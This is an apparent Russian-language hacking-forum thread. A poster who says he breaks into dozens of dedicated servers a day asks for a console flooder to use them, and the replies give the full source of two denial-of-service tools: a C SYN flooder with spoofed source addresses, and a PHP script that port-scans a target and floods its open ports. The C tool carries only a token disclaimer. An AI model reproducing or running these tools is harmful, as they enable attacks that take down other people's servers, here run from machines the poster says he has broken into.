Народ подкиньте пожалуйсто консольный TCP / SYN / HTTP флудр(досер), просто каждый день наламываю по 30-50 дедиков, есть мысль как их использовать :lol2:
(главное что бы был с консольным интерфейсом)
// This program was written to demonstrate a denial of service attack under controlled situations (proof of concept project).
// The author of this program is in no way responsible for any illegal activity.
// jethro@dqc.org
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <time.h>
#include <strings.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in_systm.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <limits.h>
#define BLEH(n) htons(n)
#define PACKETSIZE (sizeof(struct ip) + sizeof(struct tcphdr))
struct ip *ip;
struct tcphdr *tcp;
struct sockaddr_in s_in;
u_char packet[PACKETSIZE];
int get;
u_long source,target;
void usage(char *name)
{
printf("\nUsage: %s <source addr> <destination> <lowport> <highport>\n",name);
printf("if source=0, source address will be random\n\n");
exit(1);
}
u_long getaddr(char *hostname) /* Generic function, not my own */
{
struct hostent *hp;
if ((hp = gethostbyname(hostname)) == NULL)
{
fprintf(stderr, "Could not resolve %s.\n", hostname);
exit(1);
}
return *(u_long *)hp->h_addr;
}
u_short in_cksum(u_short *addr, int len) /* function is from ping.c */
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer =0;
while (nleft > 1)
{
sum += *w++;
nleft -= 2;
}
if (nleft == 1)
{
*(u_char *)(&answer) = *(u_char *)w;
sum += answer;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}
void makepacket(void) /* Thanks Richard Stevens, R.I.P. */
{
memset(packet, 0 , PACKETSIZE);
ip = (struct ip *)packet;
tcp = (struct tcphdr *) (packet+sizeof(struct ip));
ip->ip_hl = 5;
ip->ip_v = 4;
ip->ip_tos = 0;
ip->ip_len = BLEH(PACKETSIZE);
ip->ip_off = 0;
ip->ip_ttl = 40;
ip->ip_p = IPPROTO_TCP;
ip->ip_dst.s_addr= target;
tcp->th_flags = TH_SYN;
tcp->th_win = htons(65535);
s_in.sin_family = AF_INET;
s_in.sin_addr.s_addr = target;
}
void kill(u_int dstport)
{
if (source==0)
ip->ip_src.s_addr = random();
else
ip->ip_src.s_addr = source;
ip->ip_id = random();
tcp->th_sport = random();
tcp->th_dport = htons(dstport);
tcp->th_seq = random();
tcp->th_ack = random();
tcp->th_sum = in_cksum((u_short *)tcp, sizeof(struct tcphdr));
ip->ip_sum = in_cksum((u_short *)packet, PACKETSIZE);
s_in.sin_port = htons(dstport);
sendto(get,packet,PACKETSIZE,0,(struct sockaddr *)&s_in,sizeof(s_in));
//usleep(1000000); /* Debug */
}
int main(int argc, char *argv[])
{
int low,high,port;
system("clear");
if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
{
perror("socket");
exit(1);
}
if ((argc < 5) || (argc > 6))
usage(argv[0]);
system("clear");
printf("\nflooding target. control-c to terminate\n",target);
fflush(stdout);
if (atoi(argv[1])==0)
source=0;
else
source=getaddr(argv[1]);
target = getaddr(argv[2]);
low = atoi(argv[3]);
high = atoi(argv[4]);
if (low > high) {
printf("low>high \n");
exit(1);
}
if (low==high)
{
makepacket();
for (;;) {
srandom(time(NULL));
port==low;
kill(port);
}
return 0;
}
makepacket();
for (;;) {
srandom(time(NULL));
for(port = low; port <=high; port++)
kill(port);
}
return 0;
}
_______ _______ __ __
|__ | ___| |.-----..-----..--| |.-----..----.
| __| ___| || _ || _ || _ || -__|| _|
|_______|___| |__||_____||_____||_____||_____||__|
------------------------------------------------------
Tcp flooder Windows Linux for xss.pro/
Usage <?=$argv[0]?> [ip] [timeout]
------------------------------------------------------
<?
set_time_limit(0);
if(!@$argv[1]) { die(" [!] Error: ip fo attack ?\n\n"); }
else { $ip = $argv[1]; }
if(!@$argv[2]) $time = 10;
else { $ip = $argv[2]; }
$port[20]="FTP-DATA - File Transfer Protocol ";
$port[21]="FTP - File Transfer Protocol ";
$port[22]="SSH - SSH (Secure Shell) Remote Login Protocol";
$port[78]="VETTCP - vettcp";
$port[80]="WWW-HTTP - World Wide Web HTTP ";
$port[135]="=RPC-LOCATOR - RPC (Remote Procedure Call) Location Service";
$port[137]="NETBIOS-NS - NETBIOS Name Service";
$port[138]="NETBIOS-DGM - NETBIOS Datagram Service";
$port[139]="NETBIOS-SSN - NETBIOS Session Service";
$port[3306]="MYSQL";
$port[5800]="VNC - Virtual Network Computing";
$port[5801]="VNC - Virtual Network Computing";
$port[8080]="http router ili web morda";
$port[27910]="QUAKEXX";
echo " [+] Port scan..\n";
foreach($port as $p => $service) {
if(@fsockopen($ip, $p, $errno, $errstr, $time)) {
echo " [*] port: $p [open] $service\n";
//Open ports
} $open[] = $p;
}
echo " [+] Start flood.\n"; sleep(5);
while(1) {
foreach($open as $p ) {
if($fp = @fsockopen($ip, $p, $errno, $errstr, $time)) fwrite($fp, "40$%&(9tuiof\r\nh836\r\nRY UII4BUI^#t7U3udsg\r\nfb7w8293\r\n)*(&^&$@\r\n!#@*(#@N\r\n\r\n^%&^(IO\r\n\r\n");
echo "flood $p\n";
}
}
?>
Кофе херово отстирывается с колен! Как и масло впрочем тоже :lol2:кофе и бутером на колене